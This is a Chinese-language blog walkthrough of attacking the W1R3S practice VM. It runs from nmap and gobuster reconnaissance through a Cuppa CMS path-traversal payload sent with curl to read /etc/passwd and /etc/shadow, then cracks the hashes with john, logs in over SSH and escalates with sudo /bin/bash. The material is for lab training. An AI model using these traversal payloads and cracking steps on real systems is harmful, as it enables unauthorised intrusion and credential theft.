03_w1r3s靶机渗透完整流程与思路整理(信息收集,目录猜解,密码破解)
首先信息收集对收集的信息进行好的记录与分析,目录爆破发现文件管理,访问目录,尝试操作,分析cms的漏洞,目录猜解,查看文件利用curl编码解决报错,可以查看到passwd文件然后尝试查看shadow文件,利用john进行密码破解,ssh远程登录,sudo -l查看当前用户都有哪些权限,查看后发现是all,直接创建新的bash或者sh(推荐bash好用真正的权限)随后就是root权限,该靶机的难度在于对目录的猜解信息收集
nmap -sn 192.168.20.0/24//扫描网段IP发现靶机
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327181509578-180859804.png
nmap --min-rate 10000 -p- 192.168.20.21//扫描主机开放端口
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327181602816-2100596530.png
nmap -sT -sC -sV -O -p22,21,80,3306 192.168.20.21//扫描端口开放的服务
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327181635106-1016341467.png
nmap --script=vuln -p21,22,80,3306 192.168.20.21//默认脚本扫描,发现一个文件管理系统,并且有开放的ftp文件传输协议
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327184338631-1872322012.png
分析协议的优先级,服务的优先级选择一个端口下手,以ftp先开始
尝试登录ftp使用匿名用户,匿名用户登录通常是不需要密码的
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327190413265-723938413.png
账户名anonymous,然后密码输入回车
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327190500752-1608780326.png
登陆后救赎先就是查看匿名用户所拥有的文件列表使用ls命令进行查看,将查看的文件全部都保存到 自己的主机上
使用ls查看文件列表,使用cd切换目录使用mget命令将文件保存到本机的当前文件夹下
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327190648863-1656592234.png
使用cat命令分别查看三个文件的内容是什么
在这里,第一个文件内容中他的命名方式有些奇怪,需要注意的一个点是他用的并不是正常的英文字母,而是采用了广泛的leetspeack进行了编码,这种方式是为了改变命名冲突的问题https://en.wikipedia.org/wiki/Leet
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327192114198-564963491.png
所以下面所显示的内容就是WIRES.inc
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327190943906-2030438217.png
查看02.txt文件发现有两个字符出串,但是类似于加密
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327194743221-1287107028.png
用hash-identifier这个去识别一下是哪种加密方式 hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327194736602-414593607.png
对第二个字符串进行识别,但是观察两个的格式肯定是不一样的,猜测第二个是base64编码,进行解密,echo作用是防止发生断开
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327195235625-1354355342.png
解密上面的md5的字符串但是没有实际结果
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327200045073-898170852.png
查看其他两个文件:
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327203038220-676229860.png
还有一个
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327203059003-1217320421.png
但是文字是翻转的,用工具翻转
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327205013555-277611884.png
提示信息不要在这里做,记住信息
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327204942574-1682447234.png
换其他的方向,因为ftp没有收集到可以用的信息
访问80端口,是一个默认的界面,但是上面提示有文件系统,所以这里可能有其他的信息
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327205519957-324772453.png
尝试进行目录爆破
gobuster dir -u http://192.168.20.21 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221111253-2020473820.png
但是结果只有这一个看以看,经过一顿思考操作这个没什么用,但是还是要记笔记收集起来万一后面会用到的
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327211318083-1387366858.png
既然是cms那就搜一下这个cms有没有什么漏洞
使用kali默认的工具,可以看到是有的:searchsploit cuppa cms
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221302368-1964331719.png
把这个文件加载到本机当前的路径,查看文件的详细内容
searchsploit cuppa cms -m 25971
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221419735-473297604.png
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221452396-98192109.png
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221514162-645852805.png
可以看到两个路径,浏览器尝试访问,可以看到有显示信息
说明一下,url路径问题,大多数情况下在网站之中都不会将文件放在他的最初的默认下面,比如不太会放在cuppa下面,所以尝试访问的时候去找我们已经访问到的路径进行拼接,从低级目录到高级目录的拼接,所以会成为下面这样可以访问
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327221734197-759601226.png
路径访问既然有显示,接下来就是我们要看到这个文件的里面是什么内容,使用curl去解码
html2text是为了是使结果展现的更清晰,根据情况使用,没有html2text可以根据报错提示直接下载
可以到这个文件是可以成功访问的
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.20.21/administrator/alerts/alertConfigField.php | html2text
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327222955106-1341925411.png
信息分析
既然我们刚刚访问到了passwd这个文件,那么就可以尝试访问一下shadow文件,这两个文件的区别在于前者是每个用户都可以看的,存放的也只是普通用户的密码,但是shadow这个文件下面所存放的是系统用户的信息,是否能访问看网站的安全性
可以看到执行命令后出现两个很长的加密密码,这就是需要进行破解的地方(部分图片)
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.20.21/administrator/alerts/alertConfigField.php
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327223053451-1066333174.png
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327223033000-182904334.png
接下来破解这两个密码,把这两个密码复制,使用vim编辑器生成文件hash(随意)
john hash
这个截图是因为已经破解过了,看提示展示某个文件就行
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327224032553-1575280506.png
可以看到两个密码一个是computer的一个是www-data的,肯定是用计算机的去尝试ssh登录了(前面的是用户名后面的是密码,这是靶机真实情况万一有,俩都试试,但是先试一个,看看有没有什么特权,而不是试试能不能登录)
john --show hash
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327224148442-1439871669.png
提权
登录成功,初级shell拿到,接下来就是提权
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327224612461-2105117050.png
查看当前用户信息
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327224914426-958951989.png
查看当前用户sudo的权限是什么样的
sudo -l//标记位置为所有权限,那就是这个用户可以直接提权到root
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327225023986-1111311755.png
使用sudo /bin/bash 或者 sudo /bin/sh都可以执行此处的提权,本意就是创建一个新的进程?然后将这个权限是执行的sudo,又因为当前的这个用户是ALL权限,所以直接是root(我也有点这个原理上的疑惑,求证后会更改)_
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327230036187-953320888.png
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327230028464-1605414323.png
最后切换到root下,截一张大图这里
https://img2023.cnblogs.com/blog/3148246/202303/3148246-20230327230325106-1886260444.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]